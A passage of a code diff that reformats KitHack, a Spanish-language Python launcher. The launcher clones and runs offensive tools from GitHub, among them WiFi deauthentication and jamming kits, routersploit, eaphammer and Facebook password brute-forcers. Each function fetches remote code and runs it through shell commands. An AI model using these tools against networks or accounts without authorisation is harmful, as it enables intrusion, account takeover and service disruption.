os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd netool-toolkit && bash netool.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd netool-toolkit && bash netool.sh') + if not os.path.isdir("tools/Wifi/netool-toolkit"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/r00t-3xp10it/netool-toolkit.git && cd netool-toolkit && chmod +x INSTALL.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/netool-toolkit" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd netool-toolkit && bash netool.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd netool-toolkit && bash netool.sh") + def Dracnmap(): - if not os.path.isdir('tools/Wifi/Dracnmap'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/Screetsec/Dracnmap.git && cd Dracnmap && chmod +x Dracnmap.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/Dracnmap".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd Dracnmap && bash Dracnmap.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd Dracnmap && bash Dracnmap.sh') + if not os.path.isdir("tools/Wifi/Dracnmap"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/Screetsec/Dracnmap.git && cd Dracnmap && chmod +x Dracnmap.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/Dracnmap" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Wifi && cd Dracnmap && bash Dracnmap.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Wifi && cd Dracnmap && bash Dracnmap.sh") + def Airgeddon(): - if not os.path.isdir('tools/Wifi/airgeddon'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git && cd airgeddon && chmod +x airgeddon.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/airgeddon".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd airgeddon && bash airgeddon.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd airgeddon && bash airgeddon.sh') + if not os.path.isdir("tools/Wifi/airgeddon"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git && cd airgeddon && chmod +x airgeddon.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/airgeddon" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd airgeddon && bash airgeddon.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd airgeddon && bash airgeddon.sh") + def Routersploit(): - if not os.path.isdir('tools/Wifi/routersploit'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install python3-pip && cd tools && cd Wifi && git clone https://www.github.com/threat9/routersploit.git && cd routersploit && python3 -m pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/routersploit".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd routersploit && python3 rsf.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd routersploit && python3 rsf.py') + if not os.path.isdir("tools/Wifi/routersploit"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt-get install python3-pip && cd tools && cd Wifi && git clone https://www.github.com/threat9/routersploit.git && cd routersploit && python3 -m pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/routersploit" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd routersploit && python3 rsf.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd routersploit && python3 rsf.py") + def Eaphammer(): - if not os.path.isdir('tools/Wifi/eaphammer'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install python3-pip && cd tools && cd Wifi && git clone https://github.com/s0lst1c3/eaphammer.git && cd eaphammer && python3 kali-setup') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/eaphammer".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd eaphammer && python3 eaphammer') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd eaphammer && python3 eaphammer') + if not os.path.isdir("tools/Wifi/eaphammer"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt-get install python3-pip && cd tools && cd Wifi && git clone https://github.com/s0lst1c3/eaphammer.git && cd eaphammer && python3 kali-setup" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/eaphammer" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd eaphammer && python3 eaphammer") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd eaphammer && python3 eaphammer") + def VMRMDK(): - if not os.path.isdir('tools/Wifi/VMR-MDK-K2-2017R-012x4'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/chunkingz/VMR-MDK-K2-2017R-012x4.git && cd VMR-MDK-K2-2017R-012x4 && chmod +x VMR-MDK-K2-2017R-012x4.sh && mkdir VARMAC_CONFIG /root/ && mkdir VARMAC_LOGS /root/ && mkdir VARMAC_WASH /root/') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/VMR-MDK-K2-2017R-012x4".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd VMR-MDK-K2-2017R-012x4 && bash VMR-MDK-K2-2017R-012x4.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd VMR-MDK-K2-2017R-012x4 && bash VMR-MDK-K2-2017R-012x4.sh') + if not os.path.isdir("tools/Wifi/VMR-MDK-K2-2017R-012x4"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/chunkingz/VMR-MDK-K2-2017R-012x4.git && cd VMR-MDK-K2-2017R-012x4 && chmod +x VMR-MDK-K2-2017R-012x4.sh && mkdir VARMAC_CONFIG /root/ && mkdir VARMAC_LOGS /root/ && mkdir VARMAC_WASH /root/" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/VMR-MDK-K2-2017R-012x4" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd VMR-MDK-K2-2017R-012x4 && bash VMR-MDK-K2-2017R-012x4.sh" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd VMR-MDK-K2-2017R-012x4 && bash VMR-MDK-K2-2017R-012x4.sh" + ) + def Wirespy(): - if not os.path.isdir('tools/Wifi/wirespy'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/aress31/wirespy.git && cd wirespy && chmod +x wirespy.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/wirespy".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd wirespy && bash wirespy.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd wirespy && bash wirespy.sh') + if not os.path.isdir("tools/Wifi/wirespy"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/aress31/wirespy.git && cd wirespy && chmod +x wirespy.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/wirespy" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Wifi && cd wirespy && bash wirespy.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Wifi && cd wirespy && bash wirespy.sh") + def Wireshark(): - if not os.path.isfile('/usr/bin/wireshark'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install wireshark && setcap CAP_NET_RAW+eip CAP_NET_ADMIN+eip /usr/bin/dumpcap') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en /usr/bin/wireshark".format(GREEN, DEFAULT)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('wireshark') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('wireshark') + if not os.path.isfile("/usr/bin/wireshark"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt-get install wireshark && setcap CAP_NET_RAW+eip CAP_NET_ADMIN+eip /usr/bin/dumpcap" + ) + print("\n{0}[✔] Done.{1}\nHerramienta guardada en /usr/bin/wireshark". + format(GREEN, DEFAULT)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("wireshark") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("wireshark") + def SniffAir(): - if not os.path.isdir('tools/Wifi/SniffAir'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/Tylous/SniffAir.git && cd SniffAir && bash setup.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/SniffAir".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd SniffAir && python SniffAir.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd SniffAir && python SniffAir.py') + if not os.path.isdir("tools/Wifi/SniffAir"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/Tylous/SniffAir.git && cd SniffAir && bash setup.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/SniffAir" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd SniffAir && python SniffAir.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd SniffAir && python SniffAir.py") + def WifiJammer(): - if not os.path.isfile('tools/Wifi/wifijammer'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/DanMcInerney/wifijammer.git && cd wifijammer && python setup.py install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/Wifijammer".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd WifiJammer && python wifijammer') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd WifiJammer && python wifijammer') + if not os.path.isfile("tools/Wifi/wifijammer"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/DanMcInerney/wifijammer.git && cd wifijammer && python setup.py install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/Wifijammer" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd WifiJammer && python wifijammer") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd WifiJammer && python wifijammer") + def KawaiiDeauther(): - if not os.path.isfile('tools/Wifi/KawaiiDeauther'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/aryanrtm/KawaiiDeauther.git && cd KawaiiDeauther && bash install.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/KawaiiDeauther".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd KawaiiDeauther && bash KawaiiDeauther.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd KawaiiDeauther && bash KawaiiDeauther.sh') - -#Tools passwords + if not os.path.isfile("tools/Wifi/KawaiiDeauther"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/aryanrtm/KawaiiDeauther.git && cd KawaiiDeauther && bash install.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/KawaiiDeauther" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd KawaiiDeauther && bash KawaiiDeauther.sh" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd KawaiiDeauther && bash KawaiiDeauther.sh" + ) + + +# Tools passwords + + def Cupp(): - if not os.path.isdir('tools/Passwords/cupp'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Passwords && git clone https://github.com/Mebus/cupp.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/cupp".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd cupp && python3 cupp.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd cupp && python3 cupp.py') + if not os.path.isdir("tools/Passwords/cupp"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Passwords && git clone https://github.com/Mebus/cupp.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/cupp" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Passwords && cd cupp && python3 cupp.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Passwords && cd cupp && python3 cupp.py") + def Facebooker(): - if not os.path.isdir('tools/Passwords/Facebooker'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Passwords && git clone https://github.com/FakeFBI/Facebooker.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/Facebooker".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd Facebooker && perl facebooker.pl') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd Facebooker && perl facebooker.pl') + if not os.path.isdir("tools/Passwords/Facebooker"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Passwords && git clone https://github.com/FakeFBI/Facebooker.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/Facebooker" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd Facebooker && perl facebooker.pl" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd Facebooker && perl facebooker.pl" + ) + def BluForceFB(): - if not os.path.isdir('tools/Passwords/BluForce-FB'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Passwords && git clone https://github.com/AngelSecurityTeam/BluForce-FB.git && cd BluForce-FB && pip2 install mechanize') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/BluForce-FB".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd BluForce-FB && python2 bluforcefb.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd BluForce-FB && python2 bluforcefb.py') + if not os.path.isdir("tools/Passwords/BluForce-FB"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Passwords && git clone https://github.com/AngelSecurityTeam/BluForce-FB.git && cd BluForce-FB && pip2 install mechanize" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/BluForce-FB" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd BluForce-FB && python2 bluforcefb.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd BluForce-FB && python2 bluforcefb.py" + ) + def Brut3k1t(): - if not os.path.isdir('tools/Passwords/brut3k1t'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Passwords && git clone https://github.com/ex0dus-0x/brut3k1t.git && cd brut3k1t && python setup.py install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/brut3k1t".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('brut3k1t -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('brut3k1t -h') + if not os.path.isdir("tools/Passwords/brut3k1t"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Passwords && git clone https://github.com/ex0dus-0x/brut3k1t.git && cd brut3k1t && python setup.py install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/brut3k1t" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("brut3k1t -h") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("brut3k1t -h") + def SocialBox(): - if not os.path.isdir('tools/Passwords/SocialBox'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Passwords && git clone https://github.com/TunisianEagles/SocialBox.git && cd SocialBox && chmod +x SocialBox.sh && chmod +x install-sb.sh && bash install-sb.sh') - print("\n{0}[✔] 